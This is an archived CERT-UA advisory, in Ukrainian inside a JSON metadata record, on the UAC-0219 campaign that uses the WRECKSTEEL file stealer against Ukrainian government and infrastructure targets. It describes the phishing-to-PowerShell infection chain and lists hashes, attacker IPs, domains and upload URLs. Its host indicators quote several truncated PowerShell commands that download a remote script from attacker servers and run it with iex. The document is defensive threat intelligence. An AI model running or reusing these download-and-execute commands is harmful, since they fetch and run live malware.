{
	"id": "eb08beea-72bd-4917-afcd-998b470cc98b",
	"created_at": "2026-04-06T00:12:59.60059Z",
	"updated_at": "2026-04-10T03:33:36.989372Z",
	"deleted_at": null,
	"sha1_hash": "9bae4fe1d65398552c25affd215cb8fc09d8510d",
	"title": "CERT-UA",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1466791,
	"plain_text": "CERT-UA\r\nArchived: 2026-04-02 10:36:05 UTC\r\nЗагальна інформація\r\nУрядовою командою реагування на комп'ютерні надзвичайні події України CERT-UA вживаються системні\r\nзаходи щодо накопичення та проведення аналізу даних про кіберінциденти з метою надання актуальної\r\nінформації про кіберзагрози.\r\nТак, протягом березня 2025 року зафіксовано щонайменше три кібератаки у відношенні органів\r\nдержавного управління та об'єктів критичної інфраструктури України, що мали на меті збір та викрадення\r\nінформації з комп'ютерів із застосуванням відповідних програмних засобів.\r\nДля реалізації зловмисного задуму з використанням скомпрометованих облікових записів здійснюється\r\nрозповсюдження електронних листів з посиланнями на публічні файлові сервіси DropMeFiles, Google\r\nDrive тощо (деколи посилання містяться в PDF-вкладеннях), відвідування яких призведе до завантаження\r\nта запуску VBScript-лоадеру (зазвичай має розширення \".js\"). Призначенням останнього є завантаження та\r\nзапуск PowerShell-скрипта, який забезпечує пошук та вивантаження за допомогою cURL файлів відповідно\r\nдо списку розширень (\"*.doc\", \"*.txt\", \"*.docx\", \"*.xls\", \"*.xlsx\", \"*.pdf\", \"*.rtf\", \"*.odt\", \"*.csv\", \"*.ods\",\r\n\"*.ppt\", \"*.pptx\", \"*.png\", \"*.jpg\", \"*.jpeg\"), а також знімків екрану комп'ютера.\r\nДетальне дослідження кіберзагрози дозволило зробити висновок про те, що описана активність\r\nздійснюється, щонайменше, з осені 2024 року. При цьому, протягом 2024 року під час здійснення кібератак\r\nвикористовувалися EXE файли, створені за допомогою NSIS-інсталятора, що містили документ-приманку\r\n(PDF, JPG), VBScript-стілер, а також програму-графічний редактор \"IrfanView\", що використовувалася для\r\nвиготовлення скріншотів (слід зауважити, що з 2025 року функціонал виготовлення знімків екрану\r\nреалізовано за допомогою PowerShell).\r\nОсновний програмний засіб, версії якого відомі на мовах програмування VBScript та PowerShell та який\r\nпризначений для викрадення файлів, класифіковано як WRECKSTEEL.\r\nАктивність відстежується за ідентифікатором UAC-0219.\r\nБеручи до уваги нерезидентність стілерів як таких, у разі виявлення ознак здійснення кібератак просимо\r\nневідкладно інформувати CERT-UA з метою вжиття оперативних заходів кіберзахисту.\r\nІндикатори кіберзагроз\r\nФайли:\r\n(15.09.2024)\r\ne3eb9783b7140076a8c3f36a1679f4dc  6089e28a711e519890b05283de1e4abb7b63aa4d09e7ab90a92f65585779fa4b\r\n79ea606b9aa085a7546182647b9677bf  c02e57c49d940a279852109a06c19a78052dd51300975037413133c1a79e97ac\r\nhttps://cert.gov.ua/article/6282902\r\nPage 1 of 6\n\n4cab7ec6a408477bc25a5d9f5fb30263\r\n444ce0318560454c4366cf4c112ab9912adba124bb8c29697ac3d344befcb7e6\r\n897966ae3a4cbd3b63e3a0eba41158a8a3d91c4c039e50718d930cd5251e382f0f3997ec63e872539644b8c735bd4961\r\n687ec4159b78f825fe10443989070516  3c6c0ed1ff12b5489a6838b7a9d4ab84bb8e2b5f0b46fb093b39b0f030b5ef16\r\n(07.10.2024)\r\n93d0d1f7ed2c46644fb129210b4c1ccc  d26aa72fd238c0408fd365b96d8aa9662be3d4c9d479309bef428e34831aaf42\r\n4cab7ec6a408477bc25a5d9f5fb30263  444ce0318560454c4366cf4c112ab9912adba124bb8c29697ac3d344befcb7e6\r\nf236c95a1ecef37823b6ea763d4a3c54  3f2287caa07c1238e2e61e47f5cc3f91ad739636a84fbbd86d03c2d16daf36cb\r\naef0ff60a06aee4ec0a883acf32cccd6  2e38f3413f88b38ac5f958de12e6fec37dd53de3f8fb1644172e112346e5ede2\r\n(15.02.2025)\r\naaef9799a198169f8b88198cfb8c50ba  4bdaa2e9bc6c6986981d039b29085683ed36b5c2549466101a81ad660281465c\r\n9ef17ebb9e719145c07581179965538d  f2ee357c18fb1a3d229a365023456b4ce561db62e761e427fef638ec0f371ede\r\ndeaf2612c54c667481fc74ecc484495d  24885b72dc3ce5cc1530fd003bcbfb108d311de1a4ce828cb7cdc2411e705337\r\n(10.03.2025)\r\n92deaf866f3f75970690704420b9dac9  1235bf9c1b0d2a54e451b512ad34a81774d637ae58436416388fb3b7f901ad6e\r\n61f68e5d2c0e7175250cbd11713ff807  cae156d492a4aa07e3d3e4b15f843308c09df7f2c8bf44d9e7093b4393e01fe1\r\n54525fa50265ca8a0acb25e9aed76a37  e7fdee4fab59f8c4351e3c9e0a478803df9c7ac5f9163d13f476d9bb4abce5ee\r\n(18.03.2025)\r\nf79588fb4847b7c398be8457edece3e2  8acb7292c2b1163746296941977d191ef8d5fcf8bd646e4f5c4ab8718fe7b866\r\n4d1de234e39d796efe5319a4903001ff  92f961d3cb29eda1214c24c0f882f49fb9e43885f696ebec2891380e6e4ec400\r\n30b6e997a451bbf19384612a848c5536  84b438fac113615c2e81f440de2cafa4e2ccd74adc4867d73df30bb9d01dcdb6\r\n51225b5faf771938f55489f2bb128da6  c386bce3de6854bd1424467242f9cf95271de39890b5a2fb3e884e509b1b03c6\r\n62bef3a44fd6eb0da37ffb4121c6f354  566609e0e042b611c9d929cb94be4b5a17e7dbb884b4ebd2e0d68adc9fa6bf73\r\n65d5901b51f08d98a4156357ea0d4164  9a921a344913d442430a31a3dc1d01aff2b416ca601fed68633021ffefc92fab\r\n7d39f9cd4ba706e7ffcd0c8b52d1eb4c  ee8d452a1cc9bcd7e0f002a901a4ce63ddf98c0e13cba415f7325cd9cdccf0b8\r\n(20.03.2025)\r\n8a633de89ddca99ca8dd38ad43cf764a  89534f86ab5daaf55ce818872960eaa4eb64f4cc19118feea690638bf1156528\r\naefdd4d762a9657db41c23f9c4de424a  1dc1d8ccb2ca280ef9083c334432909d2a9f86eca225252a3e9a4708adc98931\r\ne46f1fa50b0b632477c22f15d00fabf2  d28c67736169af47753b5d92d82e239dc4e2b9ff03a633e5d32c8c3287e7b293\r\nМережеві:\r\n(15.09.2024)\r\nhXXp://172[.]86.114.149/seeddoc.exe\r\nhXXp://172[.]86.114.149:80/upload\r\n172.86.114.149\r\n(07.10.2024)\r\nhXXp://167[.]88.167.254:80/upload\r\nhXXp://45[.]61.159.252/visa_letter[.]exe\r\nhXXps://drobbox[.]cloud/\r\nhXXps://mfashara[.]com/\r\nhttps://cert.gov.ua/article/6282902\r\nPage 2 of 6\n\n167[.]88.167.254\r\n172[.]86.116.135\r\n172[.]86.65.194\r\n185[.]212.44.87\r\n45[.]61.159.252\r\ndrobbox[.]cloud\r\nmfashara[.]com\r\n(15.02.2025)\r\nhXXp://45[.]61.157.179/script.ps1\r\nhXXp://45[.]61.157.179/upload\r\n45[.]61.157.179\r\neschool-ua[.]online\r\nwww.eschool-ua[.]online\r\n(10.03.2025)\r\nhXXp://172[.]86.88.186/Spisok_spivrobitnykiv_na_zmenshennya_zarobitnoyi_plati_10.03_PDF.pdf\r\nhXXp://172[.]86.88.186/scripttest2.ps1\r\nhXXp://172[.]86.88.186/upload\r\nhXXps://dropmefiles[.]cc/ua/d/5l8x3hv/c2e4a009b0acaea484f4384134824c69/58ffd536202b020abd5b1ea453297b\r\nhXXps://dropmefiles[.]cc/ua/d/pweym/db923cfd3b8b67f23a1b6dee06f1f66c/62bef3a44fd6eb0da37ffb4121c6f354\r\nhXXps://dropmefiles[.]cc/ua/d/q5cy/17063277217449d39e2328a007ffb4fa/92deaf866f3f75970690704420b9dac9\r\nhXXps://iocreestr[.]tech/zakon_rada/cabinet_ministriv_postanova_1559_2024/read/\r\n172[.]86.72.194\r\n172[.]86.84.84\r\n172[.]86.88.186\r\n45[.]61.141.215\r\n91[.]203.63.10\r\niocreestr[.]tech\r\nrrrt[.]website\r\n(18.03.2025)\r\nhXXp://172[.]86.104.17/Zmini_v_hrafiku_roboti_spivrobitnykiv_14.04.2025_PDF.pdf\r\nhXXp://172[.]86.104.17/scratest.ps1\r\nhXXp://172[.]86.104.17/upload\r\nhXXp://172[.]86.88.15/Spisok_spivrobitnykiv_na_zmenshennya_zarobitnoyi_plati_06.03_PDF.pdf\r\nhXXp://172[.]86.88.15/scripttest.ps1\r\nhXXp://172[.]86.88.15/upload\r\nhXXps://api.ipify[.]org\r\nhXXps://drive.google[.]com/file/d/1bsf3i4f0jsb8bpdsxeedaejpenzo0nwt/view?usp=sharing\r\nhXXps://dropmefiles[.]cc/ua/d/zfkwbuvs/326a8605975106f1672c912bd16b4e7b/30b6e997a451bbf19384612a848c5\r\n143[.]244.46.116\r\n172[.]86.104.17\r\n172[.]86.88.15\r\n91[.]203.63.10\r\nworkai[.]work\r\nhttps://cert.gov.ua/article/6282902\r\nPage 3 of 6\n\n(20.03.2025)\r\nhXXp://144[.]172.98.178/Spisok_spivrobitnykiv_na_zmenshennya_zarobitnoyi_platy_20.03_PDF.pdf\r\nhXXp://144[.]172.98.178/scretest.ps1\r\nhXXp://144[.]172.98.178/upload\r\nhXXps://dropmefiles[.]top/ua/d/ebc5ka/d996e31032e7c288d7e20e7b82221c20/aefdd4d762a9657db41c23f9c4de42\r\n144[.]172.98.178\r\n91[.]203.63.75\r\nhttp://172.86.114.149/seeddoc.exe\r\nhttp://172.86.114.149:80/upload\r\n172.86.114.149\r\nhttp://167.88.167.254:80/upload\r\nhttp://45.61.159.252/visa_letter.exe\r\nhttps://drobbox.cloud/\r\nhttps://mfashara.com/\r\n167.88.167.254\r\n172.86.116.135\r\n172.86.65.194\r\n185.212.44.87\r\n45.61.159.252\r\ndrobbox.cloud\r\nmfashara.com\r\nhttp://45.61.157.179/script.ps1\r\nhttp://45.61.157.179/upload\r\n45.61.157.179\r\neschool-ua.online\r\nwww.eschool-ua.online\r\nhttp://172.86.88.186/Spisok_spivrobitnykiv_na_zmenshennya_zarobitnoyi_plati_10.03_PDF.pdf\r\nhttp://172.86.88.186/scripttest2.ps1\r\nhttp://172.86.88.186/upload\r\nhttps://dropmefiles.cc/ua/d/5l8x3hv/c2e4a009b0acaea484f4384134824c69/58ffd536202b020abd5b1ea453297b2a\r\nhttps://dropmefiles.cc/ua/d/pweym/db923cfd3b8b67f23a1b6dee06f1f66c/62bef3a44fd6eb0da37ffb4121c6f354\r\nhttps://dropmefiles.cc/ua/d/q5cy/17063277217449d39e2328a007ffb4fa/92deaf866f3f75970690704420b9dac9\r\nhttps://iocreestr.tech/zakon_rada/cabinet_ministriv_postanova_1559_2024/read/\r\n172.86.72.194\r\n172.86.84.84\r\n172.86.88.186\r\n45.61.141.215\r\n91.203.63.10\r\niocreestr.tech\r\nrrrt.website\r\nhttp://172.86.104.17/Zmini_v_hrafiku_roboti_spivrobitnykiv_14.04.2025_PDF.pdf\r\nhttp://172.86.104.17/scratest.ps1\r\nhttp://172.86.104.17/upload\r\nhttp://172.86.88.15/Spisok_spivrobitnykiv_na_zmenshennya_zarobitnoyi_plati_06.03_PDF.pdf\r\nhttp://172.86.88.15/scripttest.ps1\r\nhttps://cert.gov.ua/article/6282902\r\nPage 4 of 6\n\nhttp://172.86.88.15/upload\r\nhttps://api.ipify.org\r\nhttps://drive.google.com/file/d/1bsf3i4f0jsb8bpdsxeedaejpenzo0nwt/view?usp=sharing\r\nhttps://dropmefiles.cc/ua/d/zfkwbuvs/326a8605975106f1672c912bd16b4e7b/30b6e997a451bbf19384612a848c553\r\n143.244.46.116\r\n172.86.104.17\r\n172.86.88.15\r\n91.203.63.10\r\nworkai.work\r\nhttp://144.172.98.178/Spisok_spivrobitnykiv_na_zmenshennya_zarobitnoyi_platy_20.03_PDF.pdf\r\nhttp://144.172.98.178/scretest.ps1\r\nhttp://144.172.98.178/upload\r\nhttps://dropmefiles.top/ua/d/ebc5ka/d996e31032e7c288d7e20e7b82221c20/aefdd4d762a9657db41c23f9c4de424a\r\n144.172.98.178\r\n91.203.63.75\r\nХостові:\r\n%TEMP%\\Spisok_spivrobitnykiv_na_zmenshennya_zarobitnoyi_plati_27.03_PDF.pdf\r\npowershell.exe -ExecutionPolicy Bypass -NoProfile -Command \"iwr 'http://107.189.20.74/screvan.ps1' |\r\n%TEMP%\\Spisok_spivrobitnykiv_na_zmenshennya_zarobitnoyi_plati_31.03_PDF.pdf\r\npowershell.exe -ExecutionPolicy Bypass -NoProfile -Command \"iwr 'http://172.86.122.94/scrxxx.ps1' | i\r\n%TEMP%\\Zmini_v_hrafiku_roboti_spivrobitnykiv_14.04.2025_PDF.pdf\r\npowershell.exe -ExecutionPolicy Bypass -NoProfile -Command \"iwr 'http://172.86.104.17/scratest.ps1'\r\n%PROGRAMFILES%\\IrfanView\\i_view64.exe\r\n%TEMP%\\Ahmad_Aldhefairi_Visa_Appeal_Letter_PDF.pdf\r\n%TEMP%\\AppFinalDesktop.vbs\r\n%TEMP%\\lumina.exe\r\npowershell -ExecutionPolicy Bypass -NoProfile -Command \"iwr 'http://144.172.98.178/scretest.ps1' | ie\r\npowershell -ExecutionPolicy Bypass -NoProfile -Command \"iwr 'http://172.86.88.15/scripttest.ps1' | ie\r\npowershell -WindowStyle Hidden -nop -exec bypass -c \"iex (New-Object Net.WebClient).DownloadString('h\r\nwscript.exe \"%TEMP%\\AppFinalDesktop.vbs\"\r\nГрафічні зображення\r\nhttps://cert.gov.ua/article/6282902\r\nPage 5 of 6\n\nРис. 1. Приклад ланцюга ураження\r\nSource: https://cert.gov.ua/article/6282902\r\nhttps://cert.gov.ua/article/6282902\r\nPage 6 of 6",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MISPGALAXY",
		"Malpedia"
	],
	"references": [
		"https://cert.gov.ua/article/6282902"
	],
	"report_names": [
		"6282902"
	],
	"threat_actors": [
		{
			"id": "1207a5fc-7a08-4804-97d5-848f2c170a4e",
			"created_at": "2025-05-29T02:00:03.199991Z",
			"updated_at": "2026-04-10T02:00:03.856819Z",
			"deleted_at": null,
			"main_name": "UAC-0219",
			"aliases": [],
			"source_name": "MISPGALAXY:UAC-0219",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434379,
	"ts_updated_at": 1775792016,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/9bae4fe1d65398552c25affd215cb8fc09d8510d.pdf",
		"text": "https://archive.orkl.eu/9bae4fe1d65398552c25affd215cb8fc09d8510d.txt",
		"img": "https://archive.orkl.eu/9bae4fe1d65398552c25affd215cb8fc09d8510d.jpg"
	}
}